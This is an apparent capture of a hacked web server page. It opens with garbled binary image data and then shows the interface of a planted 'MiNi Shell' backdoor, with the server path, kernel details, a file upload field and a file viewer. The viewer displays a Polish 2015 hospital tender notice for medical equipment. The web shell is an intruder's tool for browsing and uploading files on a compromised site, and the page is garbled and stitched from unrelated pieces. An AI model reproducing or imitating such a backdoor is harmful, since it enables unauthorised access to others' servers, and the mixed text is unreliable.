JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151027/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151027/287514-N-2015.html

<p class="kh_header"><b>Radom: Zakup sprzętu, urządzeń i aparatury medycznej dla potrzeb placówek Radomskiego Szpitala Specjalistycznego realizowany w ramach zadania Zakup sprzętu i aparatury medycznej</b><br>
<b>Numer ogłoszenia: 287514 - 2015; data zamieszczenia: 27.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Lekarska 4, 26-610 Radom, woj. mazowieckie, tel. 48 3615285, 3615284, faks 48 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.przetargi.rszs.radom.regiony.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup sprzętu, urządzeń i aparatury medycznej dla potrzeb placówek Radomskiego Szpitala Specjalistycznego realizowany w ramach zadania Zakup sprzętu i aparatury medycznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup sprzętu, urządzeń i aparatury medycznej dla potrzeb placówek Radomskiego Szpitala Specjalistycznego realizowany w ramach zadania Zakup sprzętu i aparatury medycznej:
Część nr 1 - Przenośny aparat do USG  dla potrzeb Oddziału Anestezjologii  i Intensywnej Terapii
Część nr 2 - Aparat EKG szt. 4 dla potrzeb O/Neurologicznego, O/Chirurgii Ogólnej, SOR
Część nr 3 - Ssak elektryczny szt.2 dla potrzeb Oddziału Neurologicznego
Część nr 4 - Holter EKG wraz z osprzętem szt.2 dla potrzeb Oddziału Neurologicznego
Część nr 5 - Defibrylator dla potrzeb Oddziału Chirurgii Ogólnej
Część nr 6 - Procesor tkankowy próżniowy dla potrzeb Zakładu Patomorfologii
Część nr 7 - Stół laboratoryjny do pobierania wycinków dla potrzeb Zakładu Patomorfologii
Część nr 8 - Osmometr dla potrzeb Centralnego Medycznego Laboratorium Diagnostycznego
Część nr 9 - Zamrażarka do zamrażania osocza dla potrzeb Pracowni Serologii Transfuzjologicznej
Część nr 10 - Łóżka intensywnego nadzoru z osprzętem szt.7 dla potrzeb Oddziałów Szpitalnych
Część nr 11 - Łóżka intensywnego nadzoru z osprzętem szt.3 z udźwigiem min.250 kg, dla potrzeb Oddziałów Szpitalnych
Część nr 12 - Wózek do przewożenia chorych w pozycji leżącej szt.4
Część nr 13 - Łóżka intensywnego nadzoru z osprzętem szt.23 dla potrzeb Oddziałów Szpitalnych.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.19.21.20-9, 33.12.41.20-2, 33.12.15.00-9, 33.14.16.00-6, 33.18.21.00-0, 38.43.45.40-3, 33.19.23.00-5, 38.42.30.00-6, 39.71.11.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Warunkiem udziału w postępowaniu jest wniesienie Wadium.
2. Zamawiający określa wadium w wysokości:    
Dla części nr 1 -  1.685,19 PLN (słownie: jeden tysiąc sześćset osiemdziesiąt pięć złotych dziewiętnaście groszy)
Dla części nr 2 -  370,37 PLN ( słownie: trzysta siedemdziesiąt złotych trzydzieści siedem groszy)
Dla części nr 3 - 129,63 PLN ( słownie: sto dwadzieścia dziewięć złotych sześćdziesiąt trzy grosze)
Dla części nr 4 - 925,92 PLN ( słownie: dziewięćset dwadzieścia pięć złotych dziewięćdziesiąt dwa grosze)
Dla części nr 5 - 407,41 PLN ( słownie: czterysta siedem złotych czterdzieści jeden groszy)
Dla części nr 6 - 2.314,81 PLN ( słownie: dwa tysiące trzysta czternaście złotych osiemdziesiąt jeden groszy)
Dla części nr 7 - 585,37 PLN ( słownie: pięćset osiemdziesiąt pięć złotych trzydzieści siedem groszy)
Dla części nr 8 - 333,33 PLN ( słownie: trzysta trzydzieści trzy złote trzydzieści trzy grosze)
Dla części nr 9 - 422,76 PLN ( słownie: czterysta dwadzieścia dwa złote siedemdziesiąt sześć groszy)
Dla części nr 10 - 3.240,74 PLN ( słownie: trzy tysiące dwieście czterdzieści złotych siedemdziesiąt cztery grosze)
Dla części nr 11 - 777,78 PLN ( słownie: siedemset siedemdziesiąt siedem złotych siedemdziesiąt osiem groszy)
Dla części nr 12 - 370,37 PLN ( słownie: trzysta siedemdziesiąt złotych trzydzieści siedem groszy)
Dla część nr 13 - 2.981,48 PLN ( Słownie: dwa tysiące dziewięćset osiemdziesiąt jeden złotych czterdzieści osiem groszy)
3.Wadium musi być wniesione do dnia 2015.11.04 do godz. 10:00
4 Wadium można wnieść w następujących formach, w:
4.1. pieniądzu - przelew na konto
Pekao S. A. I o/Radom 30 1240 1789 1111 0000 0777 0652
4.2 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
4.3 gwarancjach bankowych,
4.4 .gwarancjach ubezpieczeniowych,
4.5 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o Utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (D z. U. z 2007r Nr 42, poz, 275 z późn.zm).
Jeżeli wadium zostanie wniesione w pieniądzu, przelewem Wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. Na poleceniu przelewu należy wpisać Wadium P-49-2015 dla części nr 
5.W przypadku wniesienia wadium w formie pieniężnej o jego wniesieniu w termie  decydować będzie data wpływu środków na rachunek bankowy Zamawiającego.
6.W przypadku wniesienia wadium w formie o której mowa w pkt.4.2-4.5  wymagane jest dołączenie do oferty oryginału dokumentu wystawionego na rzecz Zamawiającego. Dokumenty te muszą być ważne przez cały okres związania Wykonawcy złożoną przez niego ofertą.
7.Okoliczności i zasady zwrotu wadium określone są w ustawie Prawo zamówień publicznych art. 46 ustawy pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie
Zamawiający dokona oceny spełnienia przez Wykonawców w/w warunku udziału w postępowaniu na dzień otwarcia ofert na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu według metody  spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie
Zamawiający dokona oceny spełnienia przez Wykonawców w/w warunku udziału 
w postępowaniu na dzień otwarcia ofert na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu według metody  spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie
Zamawiający dokona oceny spełnienia przez Wykonawców w/w warunku udziału 
w postępowaniu na dzień otwarcia ofert na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu według metody  spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie
Zamawiający dokona oceny spełnienia przez Wykonawców w/w warunku udziału 
w postępowaniu na dzień otwarcia ofert na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu według metody  spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie
Zamawiający dokona oceny spełnienia przez Wykonawców w/w warunku udziału 
w postępowaniu na dzień otwarcia ofert na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu według metody  spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) Wypełnioną specyfikację techniczną zgodnie z oferowana częścią 
b) Aktualne deklaracje zgodności, certyfikaty zgodności lub wpis do Rejestru Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych ( nie dotyczy sprzętu określonego w części nr 7 - Stół laboratoryjny do pobierania wycinków dla potrzeb Zakładu Patomorfologii)
c) deklaracja CE dotycz jedynie części nr 7
d) Wykaz dostawców części zamiennych, części zużywalnych lub materiałów eksploatacyjnych określonych przez wytwórcę wyrobu ( nie dotyczy sprzętu określonego w części nr 7 - Stół laboratoryjny do pobierania wycinków dla potrzeb Zakładu Patomorfologii).
e) Wykaz podmiotów upoważnionych przez wytwórcę lub autoryzowanego przedstawiciela do wykonania czynności fachowej instalacji, okresowej konserwacji, okresowej lub doraźnej obsługi serwisowej, aktualizacji oprogramowania, okresowych lub doraźnych przeglądów, regulacji, kalibracji, wzorcowań, sprawdzeń lub kontroli bezpieczeństwa, które zgodnie z instrukcją używania wyrobu nie mogą być wykonane przez użytkownika ( nie dotyczy sprzętu określonego w części nr 7 - Stół laboratoryjny do pobierania wycinków dla potrzeb Zakładu Patomorfologii).</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) pełnomocnictwo - w oryginale lub w postaci kopii poświadczonej notarialnie,
2) dokument potwierdzający wniesienie wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące możliwość zmiany umowy:
1.zmiany terminów płatności.
2. zmiany osób reprezentujących Zamawiającego lub Wykonawcę
3. zmiany siedziby Zamawiającego lub Wykonawcy
4. zmiany numeru konta bankowego Zamawiającego lub Wykonawcy
5. zmiany stawki podatku VAT wprowadzonej przepisami prawa - może się zmienić od dnia wejścia w życie danego aktu prawnego, w takim przypadku zmieni się wartość stawki podatku VAT i ceny brutto, cena netto pozostanie bez zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> przetargi.rszs.radom.regiony.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia  26-610 Radom; ul. Lekarska 4 piętro III pokój nr 316.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.11.2015 godzina 10:00, miejsce: Radomski Szpital Specjalistyczny Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia  26-610 Radom; ul. Lekarska 4 piętro III pokój nr 316.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przenośny aparat do USG  dla potrzeb Oddziału Anestezjologii  i Intensywnej Terapii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przenośny aparat do USG  dla potrzeb Oddziału Anestezjologii  i Intensywnej Terapii.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.20-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Aparat EKG szt. 4 dla potrzeb O/Neurologicznego, O/Chirurgii Ogólnej, SOR.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparat EKG szt. 4 dla potrzeb O/Neurologicznego, O/Chirurgii Ogólnej, SOR.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.15.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ssak elektryczny szt.2 dla potrzeb Oddziału Neurologicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ssak elektryczny szt.2 dla potrzeb Oddziału Neurologicznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Holter EKG wraz z osprzętem szt.2 dla potrzeb Oddziału Neurologicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Holter EKG wraz z osprzętem szt.2 dla potrzeb Oddziału Neurologicznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.15.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Defibrylator dla potrzeb Oddziału Chirurgii Ogólnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Defibrylator dla potrzeb Oddziału Chirurgii Ogólnej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.18.21.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Procesor tkankowy próżniowy dla potrzeb Zakładu Patomorfologii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Procesor tkankowy próżniowy dla potrzeb Zakładu Patomorfologii.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.43.45.40-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Stół laboratoryjny do pobierania wycinków dla potrzeb Zakładu Patomorfologii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stół laboratoryjny do pobierania wycinków dla potrzeb Zakładu Patomorfologii.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin gwarancji - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Osmometr dla potrzeb Centralnego Medycznego Laboratorium Diagnostycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Osmometr dla potrzeb Centralnego Medycznego Laboratorium Diagnostycznego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.42.30.00-6.</p></li>
